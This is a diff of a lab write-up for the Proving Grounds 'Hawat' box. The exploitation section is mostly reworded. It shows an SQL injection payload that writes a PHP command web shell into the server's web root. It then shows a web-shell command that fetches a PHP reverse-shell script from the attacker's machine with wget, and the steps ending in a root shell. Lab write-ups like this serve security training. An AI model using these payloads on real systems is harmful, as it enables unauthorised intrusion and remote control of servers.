Bsal13/Offensive-Security-Proving-Grounds-Boxes/Hawat (Easy) Linux Box.md

 ---

 # Exploitation
-## SQL Injection in Burpsuite
+## SQL Injection

+We now have enough information to exploit the vulnerability.
+We Google “SQL injection reverse shell” and find the syntax for uploading a cmd.php page to the server to get command execution.
+We add the “priority” parameter and URL-encoded syntax to Burp Suite and forward the request.

-#### -Googled "sql injection reverse shell" and found the following web page showing the following commands to upload a cmd.php page to the server in order to get command execution:
+- We search for "SQL injection reverse shell" on Google and come across the following link, which provides instructions on how to upload a cmd.php page to the server in order to obtain command execution:

 ![](Images/Pasted%20image%2020221011103839.png)

 ![](Images/Pasted%20image%2020221011103926.png)

-#### -URL encoded the following commands:
+- We URL-encode the following command:

-"' union select '<?php echo system($_REQUEST["cmd"]); ?>' into outfile '/srv/http/cmd.php'"
+'union select '<?php echo system($_REQUEST["cmd"]); ?>' into outfile '/srv/http/cmd.php'

-#### -Added "priority='' paramater and the URL encoded syntax above into Burpsuite and forwarded the request:
+- We add the URL-encoded syntax above and the "priority='' parameter to Burpsuite and send the request:

 ![](Images/Pasted%20image%2020221011104021.png)

-#### -Navigated to "http://192.168.213.147:30455/cmd.php?cmd=" and typed "whoami" and confirmed we can run os commands:
+- We navigate to "http://192.168.213.147:30455/cmd.php?cmd=", type "whoami" and confirm we can run OS commands:

 ![](Images/Pasted%20image%2020221011104107.png)

 #sqlinjection

-#### -Saved "/usr/share/webshells/php/php-reverse-shell.php" to a file named "rev1.php" on my kali machine
+- On our Kali machine, we save "/usr/share/webshells/php/php-reverse-shell.php" to a file called "rev1.php".

 #php-reverse-shell-php

-#### -Typed "http://192.168.228.147/cmd.php?cmd=wget http://[kali IP]:30455/rev1.php -o /srv/http/rev1.php"
+- We enter "http://192.168.228.147/cmd.php?cmd=wget http://[kali IP]:30455/rev1.php -o /srv/http/rev1.php"
-#### -Typed "http://192.168.228.147/cmd.php?cmd=mv rev1.php.1 rev2.php" as I found the reverse shell script got renamed to "rev1.php.1".
-(As the file originally ended in ".1" the reverse shell was unable to be executed as it needs to end in extension ".php" to execute)

-#### -Set up a listener on port 30455.
-Typed "curl http://192.168.213.147:30455/rev2.php " on my kali machine and received a root shell:
+- We setup a listener on port 30455 on our Kali machine.

+- We type "curl http://192.168.213.147:30455/rev2.php" on our Kali terminal and receive a root shell:

 ![](Images/Pasted%20image%2020221011185330.png)
 ---